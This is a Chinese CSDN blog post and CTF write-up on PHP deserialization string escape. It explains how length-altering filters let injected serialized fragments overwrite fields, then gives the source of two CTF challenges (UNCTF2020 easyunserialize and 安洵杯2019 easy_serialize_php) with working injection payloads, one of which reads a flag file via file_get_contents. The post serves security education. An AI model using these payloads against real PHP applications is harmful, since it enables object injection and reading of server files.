php反序列化字符逃逸

最新推荐文章于 2023-01-11 01:38:05 发布
最新推荐文章于 2023-01-11 01:38:05 发布
阅读量284 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43936524/article/details/116540930
版权

文章目录


最近遇到了几题反序列化字符串逃逸的题目,所以总结一下此类题目的特点以及构造的逻辑。

非常规序列化字符串处理

首先看一个正常的反序列化例子

<?php
    $human["name"] = "kit";
    $human["sex"] = "male";
    $seri_str = serialize($human);
    echo $seri_str."<br>";
    // a:2:{s:4:"name";s:3:"kit";s:3:"sex";s:4:"male";}

从序列化字符串的格式来看每种类型都会对应有一个数字来指明值的长度,并且整个字符串以}结尾。

  1. 如果在结尾后添加无关字符
$test_str = 'a:2:{s:4:"name";s:3:"kit";s:3:"sex";s:4:"male";}ttttt';
$obj = unserialize($test_str);
var_dump($obj);
// array(2) { ["name"]=> string(3) "kit" ["sex"]=> string(4) "male" }

可以看出并不会影响反序列化过程,额外的字符会被自动舍弃

  1. 如果指明的长度与真实的长度不符合
$test_str = 'a:2:{s:4:"name";s:3:"kit";s:3:"sex";s:2:"male";}ttttt';
$obj = unserialize($test_str);
var_dump($obj);
// bool(false)

$test_str = 'a:2:{s:4:"name";s:3:"kit";s:3:"sex";s:8:"male";}ttttt';
$obj = unserialize($test_str);
var_dump($obj);
// bool(false)

无论的是比正常的长度长还是短都会提示序列化错误

  1. 序列化中存在没有声明的元素
class user{
    public $name = 'kit';
    public $sex = 'male';
    public $age = 18;
}

$str = 'O:4:"user":2:{s:4:"name";s:3:"kit";s:3:"sex";s:4:"male";}';
var_dump(unserialize($str));
// 序列化字符串中没有声明年龄 而反序列化后自动将年龄赋值为18
// object(user)#1 (3) { ["name"]=> string(3) "kit" ["sex"]=> string(4) "male" ["age"]=> int(18) }

class user{
    public $name = 'kit';
    public $sex = 'male';
}

$str = 'O:4:"user":3:{s:4:"name";s:3:"kit";s:3:"sex";s:4:"male";s:3:"age";i:18;}';
var_dump(unserialize($str));
// 类中未声明age属性 而反序列化会自动加上这个属性
// object(user)#1 (3) { ["name"]=> string(3) "kit" ["sex"]=> string(4) "male" ["age"]=> int(18

反序列化字符逃逸

而反序列化逃逸正是利用了上面的第一和第二个特性,反序列化机制严格依靠长度来读取后面的值并赋值给生成的对象且多余的字符会被自动抛弃不影响反序列化过程

下面就利用字符逃逸来实现可控字段只有姓名的情况下,修改sex从male到female。

$test_str = 'a:2:{s:4:"name";s:3:"kit";s:3:"sex";s:4:"male";}';
$obj = unserialize($test_str);
echo $obj['name']."<br>";
echo $obj['sex']."<br>";
// kit
// male

$payload = 's:6:"female";}';
$test_str = 'a:2:{s:4:"name";s:3:"kit";s:3:"sex";'.$payload.'s:4:"male";}';
$obj = unserialize($test_str);
echo $obj['name']."<br>";
echo $obj['sex']."<br>";
// kit
// female

从上面的例子看出我们需要把payload给插入到反序列化字段中就可以成功改变性别
而逃逸的本质是闭合,我们需要"闭合姓名的字符串并且构造新的性别属性以及}来闭合整个序列化字符串。
所以得到payload为

";s:3:"sex";s:6:"female";}
// payload长度为26

如果我们直接把姓名加上上述payload会产生什么样的情况呢

$human['name'] = 'kit";s:3:"sex";s:6:"female";}';
$human['sex'] = "male";
$test_str =  serialize($human);
echo $test_str."<br>";
// a:2:{s:4:"name";s:29:"kit";s:3:"sex";s:6:"female";}";s:3:"sex";s:4:"male";}

$obj = unserialize($test_str);
echo $obj['name']."<br>";
echo $obj['sex']."<br>";
// kit";s:3:"sex";s:6:"female";}
// male

可以看到并没有产生预期截断,整个payload与kit一起并认为是名字。这就是因为前面指定了姓名的这个字符串的长度为29。
而因为反序列化产生的一系列安全问题,在服务端经常会对序列化字符串进行一些黑白名单,替换或者过滤操作,而正是由于这些操作可能会修改原有序列化字符串的长度,导致了字符溢出的问题。
下面我添加一个过滤器,过滤器如果识别到'符号就会替换为no。

function filter($str){
    return preg_replace("/\'/","no",$str);
}

$fin_str = 'a:2:{s:4:"name";s:55:"kit\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'";s:3:"sex";s:6:"female";}";s:3:"sex";s:4:"male";}';
$obj = unserialize($fin_str);
echo $obj['name']."<br>";
echo $obj['sex']."<br>";
// kit''''''''''''''''''''''''''";s:3:"sex";s:6:"female";}
// male

$fin_str = filter($fin_str);
echo $fin_str."<br>";
// a:2:{s:4:"name";s:55:"kitnononononononononononononononononononononononononono";s:3:"sex";s:6:"female";}";s:3:"sex";s:4:"male";}
$obj = unserialize($fin_str);
echo $obj['name']."<br>";
echo $obj['sex']."<br>";
// kitnononononononononononononononononononononononononono
// female

可以看到这次传入字符成功溢出然后修改了属性为female
在这里插入图片描述
过滤器前后的序列化字段对比可以很清楚的看出来,传入的name字段长度为55,而橙色方框内payload";s:3:"sex";s:6:"female";}长度为26,而'的长度也为26,通过过滤器后所有的单引号变为了no长度增加了一倍,此时kit+no的长度为55刚好完全覆盖姓名的长度。所以payload在解析时不再被认为是姓名字符串,产生了截断。最后的sex属性以及属性值则当做多余字符被抛弃。
所以这种字符溢出构造完全基于上述的两种特性,造成解析的错误而构成对象。

CTF题目

字符增加溢出

UNCTF2020–easyunserialize

<?php
error_reporting(0);
highlight_file(__FILE__);

class a
{
    public $uname;
    public $password;
    public function __construct($uname,$password)
    {
        $this->uname=$uname;
        $this->password=$password;
    }
    public function __wakeup()
    {
            if($this->password==='easy')
            {
                include('flag.php');
                echo $flag;    
            }
            else
            {
                echo 'wrong password';
            }
        }
    }

function filter($string){
    return str_replace('challenge','easychallenge',$string);
}

$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>

题目源码非常简单,获得flag的要求就是触发_wakeup函数时password等于easy。而password在序列化前被赋值为1,uname是我们可控的数据。
过滤器同样是增加字符长度的过滤器,所以就可以靠反序列化过程中字符溢出来修改password的值。
challengeeasychallenge增加了四个字符长度。
先获得正常情况下的序列化字符串

O:1:"a":2:{s:5:"uname";s:3:"kit";s:8:"password";i:1;}

截断payload

长度 29
";s:8:"password";s:4:"easy";}

每次替换增加4个字符,采用8个challenges会增加32个字符用来溢出,而payload的长度为29,所以最后还要添加三个}}}否则反序列化是失败。
最后的payload

challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy";}}}}

字符减少溢出

安洵杯 2019–easy_serialize_php

<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

根据最后一个函数,先执行phpinfo看下
在这里插入图片描述
找到了自动包含的文件d0g3_f1ag.php
extract函数的作用为变量覆盖,会提取传入的数组中的key和value去覆盖当前key的value

<?php
$_SESSION["user"] = 'guest';
$_SESSION['function'] = 'test';
var_dump($_SESSION);
echo "<br/>";
extract($_POST);
var_dump($_SESSION);

在这里插入图片描述
因为img_path赋值在extract之后所以我们无法覆盖,通过extract创建新值再利用filter去减少key的长度来达到解析key时会把后面的value也算进去,从而构建一个新的img_path。
1.flagflag被过滤器删除,导致flagflag对应的部分被当做键名,后面增加s:1:“1”;当做新的值。再接上img去构造一个新的键值对。
payload:

_SESSION[flagflag]=";s:1:"1";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

payload可以看成两部分,";s:49:"为补充的value值,;s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";为新建的键值对。

序列化字段经过filter后

a:2:{s:8:"";s:49:"";s:1:"1";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

";s:49:"被当做键名。完成字符逃逸。
在这里插入图片描述
在这里插入图片描述
修改目标文件最后拿到flag。

最后给出另外一种逃逸方法,思想与上面所描述的相同,利用值溢出去覆盖键,刚刚的方法是利用键溢出去覆盖值。

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}

同样来看下序列化以后的字段

a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

";s:8:"function";s:59:"a被当做user的值,而原本function的值中s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";构成了一组新的键值对完成覆盖。

kit_1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP序列字符串溢出
Keepb1ue的博客
12-29 6334
序列字符逃逸常见于CTF中,所以在这里记录下 导致序列字符逃逸的原因:是因为对序列后的字符进行过滤,导致用户可控字符溢出,从而控制序列内容,配合对象注入导致RCE。 0x01:Track 在学习序列字符逃逸之前,首先要了解序列的一些小Track: php序列时,底层代码是以 ; 作为字段的分隔,以 ;} 作为结尾,并且是根据长度判断内容的 ,同时序列的过程中必须严格按照序列规则才能成功实现序列 。 class A{ public $T1 = '123'; p
某CTF---php序列字符串溢出
3tefanie丶zhou的博客
12-28 2622
【我们的言语,既会千山万水,迷障横生,也能铺路搭桥,柳暗花明。故而与亲近之人朝夕久处,不可说气话,不可说话,不可不说话。】
<?php highlight_file(__FILE__); error_reporting(0); $file = $_GET["file"]; if (stristr($file, "file")){ die("你败了."); } //fl
weixin_35753431的博客
01-11 1542
这段代码是一个 PHP 程序,它实现了从用户输入中获取文件名并输出文件内容的功能。 首先,通过调用 highlight_file(FILE) 函数来输出代码,并通过 error_reporting(0) 函数来关闭错误报告。 然后,通过 $_GET["file"] 变量来获取文件名。 之后,判断文件中是否包含"file"字符串 ,如果包含的话,输出 "你败了." 最后,通过 file_get_c...
UNCTF 2020 WP
qq_45796470的博客
03-11 2507
UNCTF 2020 WP WEB easy_ssrf 由题ssrf,且代码过滤了很多重要手段。这里可以直接/?url=unctf.com/…/…/…/…/flag。直接…/穿越读flag。 easyunserialize <?php error_reporting(0); highlight_file(__FILE__); class a { public $uname; public $password; public function __construct($un
php序列字符逃逸
qq_53856457的博客
05-14 1577
php序列字符逃逸法 1.按我的理解,序列的过程就是碰到;}与最前面的{配对后,便停止序列。如下序列: <?php class Test { public $a = "aa"; public $b = "bbb"; public $c = "cccc"; } $qwe = new Test(); echo serialize($qwe); 输出序列结果为:O:4:“Test”:3:{s:1:“a”;s:2:“aa”;s:1:“b”;s:3:“bbb”;s:1:“c”;
php序列逃逸1
08-03
}结束,后的字符串不影响正常的序列php序列逃逸知识点 - 属性逃逸般在数据先经过次 serialize 再经过 unserialize,在这个中间
php序列长度变尾部字符逃逸(0CTF-2016-piapiapia)
10-15
PHP序列长度变尾部字符逃逸】是一种安全漏洞利用技术,通常出现在使用PHP的系统中。在PHP中,对象序列是将对象转换为可存储或传输的字符串的过程,而序列则是将这个字符串恢复为原始对象的过程。...
PHP序列漏洞详解.rar
02-07
PHP序列漏洞详解-CTF
shiro序列测试工具.zip
06-04
shiro序列测试工具包,两个使用任意一个即可
PHP序列漏洞研究
06-17
PHP序列漏洞研究 PHP序列漏洞是指攻击者可以通过构造恶意的序列数据来执行恶意代码或泄露敏感信息的漏洞。这种漏洞通常发生在使用PHP的serialize()和unserialize()函数时。 在PHP中,serialize()函数...
ctfshow—PHP特性
cosmoslin的博客
09-14 2189
PHP特性 以ctfshow平台题目为例 web89 intval() 函数用于获取变量的整数值。 intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 web 90 int intval ( mixed $var [, int $base = 10 ] ) 如果 base 是 0,通过检测 var 的格式来决定使用的进制: 如果字符串包括了 “0x
[NPUCTF2020]ReadlezPHP 看答案懂了
zxnimud5的专栏
09-12 516
看代码./time.php?source <?php #error_reporting(0); classHelloPhp { public$a; public$b; publicfunction__construct(){ $this->a="Y-m-dh:i:s"; $this->b="date"; } publicfunction__destruct(){ $a=$...
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 5599
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
php error_reporting(0);,php error_reporting()函数的用法举例(错误捕捉)
weixin_42365604的博客
03-13 3445
php error_reporting()函数的用法举例,供大家学习参考。学习CI框架过程中遇到个问题:A PHP Error was encounteredSeverity: NoticeMessage: Undefined variable: user默认的普通PHP文件中输出一个未定义声明的变量是不会报错误的,但在codeigniter框架下却要报错误,这对于想集成 添加 和 修改 页面于一...
【BUUCTF】Web题解
xuanyulevel6的博客
08-08 5059
【BUUCTF】Web题解
从一道简单题对php序列与命令执行的再认识——绿盟杯2021 flag在哪里
Mrs_H的博客
10-24 508
前言 最近做了很多比赛的题目,而且都是我认为学的不错的PHP序列题目。但结果却是被暴打,现在新颖的题目类型,以及利用方法是都是我之前没有学到的。有些本应该会的题目也会因为粗心大意没有细心去解决问题。说多了,还是自己太菜了。咱们接下来上正菜。 正文 (以下的解题思路来自于末初大佬) 下面是题目的源代码 <?php error_reporting(0); <?php error_reporting(0); class begin{ public $file; public $mo
ctfshow 月饼杯
qq_45655564的博客
09-02 349
web1_此夜圆 一个简单的序列逃逸 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup() { if($this->pa
ctf中的一道序列
weixin_40709439的博客
09-27 5248
早就想写了,今天刚好遇到一道序列的题就记录一下 自己在本地搭的,源码如下: index1.php &lt;?php error_reporting(E_ALL &amp; ~E_NOTICE); $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&amp;&amp;...
PHP代码审计基础:序列漏洞
1匹黑马
12-08 423
文章目录序列序列 序列序列 序列:把对象转换为字节序列的过程,称为对象的序列序列:把字节序列恢复为对象的过程,称为对象的序列
fastjson序列字符串数组
最新发布
03-03
下面是一个示例代码,演示了如何使用Fastjson序列字符串数组: ```java import com.alibaba.fastjson.JSON; public class Main { public static void main(String[] args) { String jsonString = "[\"string...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值